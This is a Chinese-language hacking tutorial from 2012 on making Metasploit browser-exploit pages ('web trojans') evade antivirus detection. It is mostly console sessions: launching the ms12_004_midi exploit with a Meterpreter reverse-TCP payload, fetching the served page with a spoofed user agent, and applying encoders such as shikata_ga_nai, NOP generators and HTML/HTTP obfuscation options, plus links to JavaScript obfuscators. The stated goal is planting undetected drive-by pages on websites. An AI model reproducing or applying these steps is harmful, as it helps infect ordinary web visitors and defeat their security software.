热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

Metasploit网马的免杀

发布时间:2012-05-16 09:06文章来源:Dis9文章作者:brk 点击次数:
摘要:关于网马 近几年国内网站挂马呈现井喷式的增长,网马解密也逐步为人们所重视. 网马就是在网页中植入木马,你打开网页就运行了木马程序,使你在不知不觉中中毒。 网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该...

关于网马

近几年国内网站挂马呈现井喷式的增长,网马解密也逐步为人们所重视.
网马就是在网页中植入木马,你打开网页就运行了木马程序,使你在不知不觉中中毒。
网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。
为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。

关于metasploit

metasploit聚合了上百的网马,你可以随心使用喜欢的shellcode,让渗透更加简单,但是在这工程中,如果对方按张了防火墙咋办?
就像下图:

Metasploit网马的免杀


网马免杀

哪最新的midiOutPlayNextPolyEvent Heap Overflow来说 ,先生成一个普通的

msf > use exploit/windows/browser/ms12_004_midi
msf exploit(ms12_004_midi) > show options

Module options (exploit/windows/browser/ms12_004_midi):

Name Current Setting Required Description
---- --------------- -------- -----------
OBFUSCATE false no Enable JavaScript obfuscation
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 5.5.5.1 yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Automatic

msf exploit(ms12_004_midi) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 5.5.5.1:4444
[*] Using URL: http://0.0.0.0:8080/qhvy86C7TNlbqQN
[*] Local IP: http://112.114.168.177:8080/qhvy86C7TNlbqQN
[*] Server started.
msf exploit(ms12_004_midi) >

查看网马代码 看看传说中的网马

[email protected]:~$ wget -U "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)" http://112.114.168.177:8080/qhvy86C7TNlbqQN -O 1 | more 1
--2012-03-12 01:18:15-- http://112.114.168.177:8080/qhvy86C7TNlbqQN
正在连接 112.114.168.177:8080... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度: 35426 (35K) [text/html]
正在保存至: “1”

100%[======================================>] 35,426 --.-K/s 花时 0s

2012-03-12 01:18:15 (213 MB/s) - 已保存 “1” [35426/35426])

::::::::::::::
1
::::::::::::::

<html>
<head>
<script language='javascript'>
//
// JavaScript Heap Exploitation library
// by Alexander Sotirov <[email protected]>
//
// Version 0.3
//
// Copyright (c) 2007, Alexander Sotirov
// All rights reserved.
//
// The HeapLib library is licensed under a BSD license, the text of which follow
s:
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions
// are met:
//
// 1. Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// 2. Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
// 3. Neither the name of Alexander Sotirov nor the name of Determina Inc.
// may be used to endorse or promote products derived from this software
// without specific prior written permission.

恩 操蛋啊 明文的 不被杀才挂
ENCODER免杀

Metasploit提供了SHELLCODE生成EXE PHP VBS DLL等等 也提供了免杀的功能,网马呢? 能的
先结束网马进程

msf exploit(ms12_004_midi) > jobs

Jobs
====

Id Name
-- ----
0 Exploit: windows/browser/ms12_004_midi

msf exploit(ms12_004_midi) > kill 0
Stopping job: 0...

[*] Server stopped.
msf exploit(ms12_004_midi) >

用ENCODER进行网页编码 可选项:

set ENCODER cmd/generic_sh set ENCODER x86/call4_dword_xor
set ENCODER cmd/ifs set ENCODER x86/context_cpuid
set ENCODER cmd/printf_php_mq set ENCODER x86/context_stat
set ENCODER generic/none set ENCODER x86/context_time
set ENCODER mipsbe/longxor set ENCODER x86/countdown
set ENCODER mipsle/longxor set ENCODER x86/fnstenv_mov
set ENCODER php/base64 set ENCODER x86/jmp_call_additive
set ENCODER ppc/longxor set ENCODER x86/nonalpha
set ENCODER ppc/longxor_tag set ENCODER x86/nonupper
set ENCODER sparc/longxor_tag set ENCODER x86/shikata_ga_nai
set ENCODER x64/xor set ENCODER x86/single_static_bit
set ENCODER x86/alpha_mixed set ENCODER x86/unicode_mixed
set ENCODER x86/alpha_upper set ENCODER x86/unicode_upper
set ENCODER x86/avoid_utf8_tolower

我用x86/shikata_ga_nai吧

msf exploit(ms12_004_midi) > set ENCODER x86/shikata_ga_nai
ENCODER => x86/shikata_ga_nai
msf exploit(ms12_004_midi) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 5.5.5.1:4444
[*] Using URL: http://0.0.0.0:8080/gNaH1Zi9e5
[*] Local IP: http://112.114.168.177:8080/gNaH1Zi9e5
[*] Server started.
msf exploit(ms12_004_midi) >

nops

一序列的0x90的位元组,Metasploit可生成不可预测的

msf exploit(ms11_050_mshtml_cobjectelement) > show nops

NOP Generators
==============

Name Disclosure Date Rank Description
---- --------------- ---- -----------
armle/simple normal Simple
php/generic normal PHP Nop Generator
ppc/simple normal Simple
sparc/random normal SPARC NOP generator
tty/generic normal TTY Nop Generator
x64/simple normal Simple
x86/opty2 normal Opty2
x86/single_byte normal Single Byte

evasion

恩,查看一下:

msf exploit(ms11_050_mshtml_cobjectelement) > show evasion

Module evasion options:

Name : HTML::base64
Current Setting: double_pad
Description : Enable HTML obfuscation via an embeded base64 html object (IE
not supported) (accepted: none, plain, single_pad, double_pad,
random_space_injection)

Name : HTML::javascript::escape
Current Setting: 0
Description : Enable HTML obfuscation via HTML escaping (number of iterations)

Name : HTML::unicode
Current Setting: utf-32le
Description : Enable HTTP obfuscation via unicode (accepted: none, utf-16le,
utf-16be, utf-16be-marker, utf-32le, utf-32be)

Name : HTTP::chunked
Current Setting: false
Description : Enable chunking of HTTP responses via "Transfer-Encoding:
chunked"

Name : HTTP::compression
Current Setting: none
Description : Enable compression of HTTP responses via content encoding
(accepted: none, gzip, deflate)

Name : HTTP::header_folding
Current Setting: false
Description : Enable folding of HTTP headers

Name : HTTP::junk_headers
Current Setting: false
Description : Enable insertion of random junk HTTP headers

Name : HTTP::server_name
Current Setting: Apache
Description : Configures the Server header of all outgoing replies

Name : TCP::max_send_size
Current Setting: 0
Description : Maximum tcp segment size. (0 = disable)

Name : TCP::send_delay
Current Setting: 0
Description : Delays inserted before every send. (0 = disable)

msf exploit(ms11_050_mshtml_cobjectelement) >

这个很简单 选择就行
Social-Engineer Toolkit

Social-Engineering Toolkit(SET) 是一个由 David Kennedy (ReL1K)设计的社会工程学工具.SET在统一简单的界面上集成了多个有用的社会工程学攻击工具,他主要就是利用了metasploit的网马 + 网页伪造 + DNS 欺骗,这个需要装好多东西,有功夫的自己搞
自动动手

生成了网马用wget伪造AGENT下载以后进行免杀

http://www.daftlogic.com/projects-online-javascript-obfuscator.htm

http://javascriptcompressor.com

http://dean.edwards.name/weblog/2007/04/packer3
更改源代码

http://funoverip.net/2011/04/100pc-anti-virus-evasion-with-metasploit-browser-exploits-from-ms11-003/

标签分类:

上一篇:脱壳免杀技术大纲
下一篇:使用Metasploit制作DEB包木马与后门